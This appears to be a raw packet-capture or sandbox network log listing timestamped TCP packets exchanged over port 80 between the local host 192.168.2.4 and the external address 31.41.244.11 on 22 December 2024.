Dec 22, 2024 02:16:14.754185915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.754221916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.754235029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.754266024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.754919052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.755048037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.755084991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.755094051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.755851030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.755899906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.755971909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.756007910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.756017923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.756705999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.756753922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.756828070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.756863117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.756910086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.757601976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.757642984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.757709026 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.757742882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.757791996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.758486986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.758624077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.758656979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.758671999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.758701086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.759371042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.759691000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.759741068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.759795904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.759831905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.759877920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.760548115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.760592937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.760667086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.760703087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.760754108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.761430025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.761560917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.761595964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.761611938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.762013912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.762314081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.762447119 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.762481928 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.762510061 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.762537956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.763266087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.763458967 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.763495922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.763518095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.763545036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.764106989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.764236927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.764271975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.764297962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.764313936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.764998913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.765048981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.765116930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.765152931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.765171051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.765198946 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.765871048 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.765923977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.766025066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.766058922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.766108036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.766757965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.766895056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.766930103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.766952038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.766979933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.772948980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773185015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773220062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773256063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.773293972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.773420095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773509979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773545980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.773560047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.773596048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.774246931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.775207043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.931077957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931149006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931184053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.931188107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931224108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.931232929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931232929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.931386948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931405067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.931433916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.931456089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.932089090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.932136059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.932223082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.932240963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.932269096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.932969093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.933023930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.933129072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.933146000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.933171988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.933188915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.933892012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.933936119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.934015989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.934032917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.934067011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.934067011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.934746027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.934793949 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.934834003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.934850931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.934871912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.934884071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.935632944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.935677052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.935750008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.935774088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.935796022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.935811996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.936568975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.936608076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.936614990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.936628103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.936661005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.936661005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.937421083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.937561035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.937577963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.937607050 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.937624931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.938327074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.938462973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.938479900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.938500881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.938524961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.939245939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.939302921 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.939327955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.939352036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.939369917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.940083027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.940254927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.940272093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.940300941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.940318108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.940977097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941076040 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941092968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941123009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.941864967 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941910982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.941942930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941960096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.941987038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.942012072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.942707062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.942750931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.942837954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.942856073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.942882061 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.942898035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.943645954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.943690062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.943736076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.943752050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.943778992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.943794966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.944534063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.944655895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.944673061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.944706917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.945420027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.945466042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.945519924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.945537090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.945580959 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.946260929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.946511030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.946527958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.946554899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.946569920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.947168112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.947218895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.947276115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.947293043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.947329044 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.947329044 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.948115110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.948257923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.948276043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.948302031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.948332071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.948960066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.949119091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.949134111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.949160099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.949177980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.949830055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950020075 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.950033903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950052977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950078011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.950092077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.950702906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950756073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.950812101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950829983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.950856924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.950880051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.951647997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.951891899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.951937914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.952028036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.952045918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.952090979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.952800035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.952843904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.952896118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.952913046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.952955008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.953691959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.953881025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.953896999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.953923941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.953938961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.954658031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.954762936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.954778910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.954806089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.954833984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.955471992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.955629110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.955646038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.955672026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.955689907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.956353903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.956461906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.956479073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.956505060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.956523895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.957230091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.957384109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.957400084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.957427025 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.957444906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.958184004 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.958233118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.958250999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.958277941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.958302975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.959012985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.959220886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.959238052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.959268093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.959283113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965189934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965214968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965235949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965236902 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965250969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965275049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965626955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965651035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965671062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.965675116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965693951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.965727091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.966259956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.970029116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.123358011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123423100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123440981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123514891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.123538017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123548031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.123589039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.123672009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123688936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.123718977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.123732090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.124250889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.124300003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.124362946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.124381065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.124428988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.125171900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.125225067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.125241995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.125273943 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.125288963 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.126008987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.126162052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.126178980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.126209974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.126252890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.126991034 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127008915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127024889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127048016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.127063990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.127787113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127839088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.127909899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127928972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.127979040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.128710032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.128757954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.128810883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.128829002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.128871918 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.129702091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.129719973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.129736900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.129765034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.129781961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.130594015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.130610943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.130628109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.130656958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.130671978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.131366968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.131431103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.131448030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.131479979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.131496906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.132251978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.132349968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.132366896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.132401943 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.132416964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.133128881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.133243084 CET	80	49765	31.41.244.11	192.168.2.4
